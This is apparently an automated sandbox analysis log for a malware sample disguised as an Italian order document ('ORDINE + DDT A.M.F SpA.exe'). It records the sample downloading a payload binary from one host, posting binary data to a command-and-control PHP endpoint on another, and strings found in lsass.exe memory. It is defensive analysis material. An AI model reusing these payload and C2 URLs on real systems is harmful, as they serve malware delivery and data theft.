        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238316483595.000001896B13A000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242870817729.000001896B13A000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242865101495.00000000008EE000.00000004.00000020.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238265231618.00000000008F4000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238264679132.00000000008F4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867069174.000001896AE44000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242865101495.00000000008EE000.00000004.00000020.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238265231618.00000000008F4000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238264679132.00000000008F4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867069174.000001896AE44000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238316483595.000001896B13A000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242870817729.000001896B13A000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
        Source: lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238334385048.000001896B043000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869451561.000001896B047000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238316483595.000001896B13A000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242870817729.000001896B13A000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: lsass.exe, 0000000C.00000000.238314085790.000001896AEE7000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867965216.000001896AEE7000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242866479369.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
        Source: lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238316483595.000001896B13A000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238332289921.000001896AE44000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242870817729.000001896B13A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238334385048.000001896B043000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869451561.000001896B047000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://ocsp.digicert.com0C
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0G
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://ocsp.digicert.com0O
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312051289.000001896A697000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867684725.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238334385048.000001896B043000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238331126240.000001896A697000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865216162.000001896A697000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869331918.000001896B03B000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242869451561.000001896B047000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
        Source: lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864624945.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330748569.000001896A64F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311677134.000001896A64F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
        Source: lsass.exe, 0000000C.00000000.238330579138.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242864361281.000001896A62F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311500660.000001896A62F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
        Source: lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238311836953.000001896A66F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238330911013.000001896A66F000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exeString found in binary or memory: http://www.digicert.com/CPS0
        Source: lsass.exe, 0000000C.00000000.238331954183.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238324386558.000001896B033000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238323976665.000001896AFAE000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238321645377.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242867014534.000001896AE3F000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238313834859.000001896AEB4000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312900173.000001896AE00000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000000.238312403907.000001896A6DC000.00000004.00000001.sdmp, lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
        Source: lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.live.com
        Source: lsass.exe, 0000000C.00000002.242865373813.000001896A6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpString found in binary or memory: https://fabricraft.co.za/
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpString found in binary or memory: https://fabricraft.co.za/.
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242866850076.0000000002430000.00000004.00000001.sdmp, ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpString found in binary or memory: https://fabricraft.co.za/Farmant_hhVNwJna195.bin
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpString found in binary or memory: https://fabricraft.co.za/Farmant_hhVNwJna195.binc
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpString found in binary or memory: https://fabricraft.co.za/Farmant_hhVNwJna195.binn
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864292480.000000000087C000.00000004.00000020.sdmpString found in binary or memory: https://fabricraft.co.za/Farmant_hhVNwJna195.binws;
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000002.242864836413.00000000008D1000.00000004.00000020.sdmpString found in binary or memory: https://farmanat.ro/arman30/five/fre.php
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238266059758.000000001E4B0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238266059758.000000001E4B0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238266059758.000000001E4B0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000003.238266059758.000000001E4B0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
        Source: ORDINE + DDT A.M.F SpA.exeString found in binary or memory: https://www.digicert.com/CPS0
        Source: unknownHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 178Connection: close
        Source: unknownDNS traffic detected: queries for: fabricraft.co.za
        Source: global trafficHTTP traffic detected: GET /Farmant_hhVNwJna195.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: fabricraft.co.zaCache-Control: no-cache
        Source: unknownHTTPS traffic detected: 197.242.150.64:443 -> 192.168.11.20:49816 version: TLS 1.2
        Source: ORDINE + DDT A.M.F SpA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022782FF2_2_022782FF
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227CF922_2_0227CF92
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022776252_2_02277625
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227622C2_2_0227622C
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276A382_2_02276A38
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D2032_2_0227D203
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278A092_2_02278A09
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227BE732_2_0227BE73
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227BE7D2_2_0227BE7D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D2452_2_0227D245
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022726552_2_02272655
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B6512_2_0227B651
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C2512_2_0227C251
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227768F2_2_0227768F
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227728D2_2_0227728D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276AE42_2_02276AE4
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C2E12_2_0227C2E1
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276ED62_2_02276ED6
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B6DF2_2_0227B6DF
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C2DF2_2_0227C2DF
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022783272_2_02278327
